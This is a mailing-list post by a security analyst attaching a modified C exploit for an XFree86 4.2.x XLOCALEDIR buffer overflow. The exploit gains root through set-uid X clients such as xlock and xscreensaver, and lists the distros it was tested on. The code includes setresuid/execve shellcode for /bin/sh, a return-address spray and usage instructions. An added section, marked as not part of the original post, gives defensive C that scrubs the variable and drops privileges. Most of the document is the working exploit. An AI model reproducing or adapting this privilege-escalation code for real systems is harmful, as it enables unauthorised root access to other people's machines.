Re: xscreensaver exploit for Redhat 7.3

Hi all,
exploit attached.

Comments are welcome.

Sincerely,

+-------------------------------------------------------------------+
| Agazzini Maurizio                       Tel:   +39-011-32.72.100  |
| Security Analyst                        Fax:   +39-011-32.46.497  |
| @ Mediaservice.net S.R.L.          D.S.D. Data Security Division  |
|                                                                   |
| PGP Key   : http://www.wayreth.eu.org/Inode.asc                   |
| Disclaimer: http://@Mediaservice.net/disclaimer                   |
+-------------------------------------------------------------------+
/*

	Original exploit:
		** oC-localX.c - XFree86 Version 4.2.x local root exploit
		** By dcryptr && tarranta / oC

	This exploit is a modified version of the original oC-localX.c
	built to work without any offset. 

	Some distros have the file: /usr/X11R6/bin/dga +s
	This program isn't exploitable because it drops privileges
	before running the Xlib function vulnerable to this overflow.

	This exploit works on Linux x86 on all distros. 

	Tested on:	
		- Slackware 8.1 ( xlock, xscreensaver, xterm)
		- Redhat 7.3 ( manual +s to xlock )
		- Suse 8.1 ( manual +s to xlock )

	by Inode <inode@mediaservice.net>

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

static char shellcode[] = 

        /* setresuid(0,0,0); */
 	"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80"
        /* /bin/sh execve(); */
        "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
        "\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"
        /* exit(0); */
        "\x31\xdb\x89\xd8\xb0\x01\xcd\x80";


#define ALIGN 0 

int main(int argc, char **argv)
{
	char 	buffer[6000];
	int i;
	int ret;
	char *env[3] = {buffer,shellcode,  NULL}; 

	int *ap;

	strcpy(buffer, "XLOCALEDIR=");

	printf("\nXFree86 4.2.x Exploit modified by Inode <inode@mediaservice.net>\n\n");
	if( argc != 3 )
	{
		printf(" Usage: %s <full path> <name>\n",argv[0]);
		printf("\n Example: %s /usr/X11R6/bin/xlock xlock\n\n",argv[0]);
		return 1;
	}

	ret = 0xbffffffa - strlen(shellcode) - strlen(argv[1]) ;

	ap = (int *)( buffer + ALIGN + strlen(buffer) );

	for (i = 0; i < sizeof(buffer); i += 4)
		*ap++ = ret;
	
	execle(argv[1], argv[2], NULL, env);

	return(0);
}
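
The comment in the attached code notes that dga is not exploitable because it drops privileges before reaching the vulnerable Xlib function. The same idea as a startup routine for a set-uid X client, which also discards an implausible XLOCALEDIR value, is shown here as an added example that is not part of the original post; every function name and the 4096-byte cap are assumptions.

```c
/* Added example, not from the original post; all names are hypothetical. */
#define _DEFAULT_SOURCE 1
#include <stdlib.h>
#include <unistd.h>

#define MAX_LOCALE_PATH 4096 /* assumed cap, equal to PATH_MAX on Linux */

/* 1 if v is a plausible locale directory: absolute path, shorter than the
 * cap, printable ASCII only. A value packed with stack addresses fails. */
int xlocaledir_value_ok(const char *v)
{
    size_t i;
    if (v[0] != '/')
        return 0;
    for (i = 0; v[i] != '\0'; i++)
        if (i >= MAX_LOCALE_PATH - 1 || (unsigned char)v[i] < 0x20 || (unsigned char)v[i] > 0x7e)
            return 0;
    return 1;
}

/* Remove XLOCALEDIR when the process is privileged or the value is
 * implausible. Returns 0 = kept or absent, 1 = removed, -1 = error. */
int scrub_xlocaledir(int privileged)
{
    const char *v = getenv("XLOCALEDIR");
    if (v == NULL || (!privileged && xlocaledir_value_ok(v)))
        return 0;
    return unsetenv("XLOCALEDIR") == 0 ? 1 : -1;
}

/* Give up set-uid/set-gid rights for good: group first, then user. */
int drop_privileges(void)
{
    uid_t u = getuid(), old_eu = geteuid();
    gid_t g = getgid();
    if (setregid(g, g) != 0 || setreuid(u, u) != 0)
        return -1;
    /* Verify the drop: regaining the old effective uid must now fail. */
    if (u != 0 && old_eu != u && seteuid(old_eu) == 0)
        return -1;
    return (geteuid() == u && getegid() == g) ? 0 : -1;
}

/* Call first in main(), before any Xlib function reads the environment. */
int harden_before_xlib(void)
{
    int privileged = getuid() != geteuid() || getgid() != getegid();
    return scrub_xlocaledir(privileged) < 0 ? -1 : drop_privileges();
}
```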
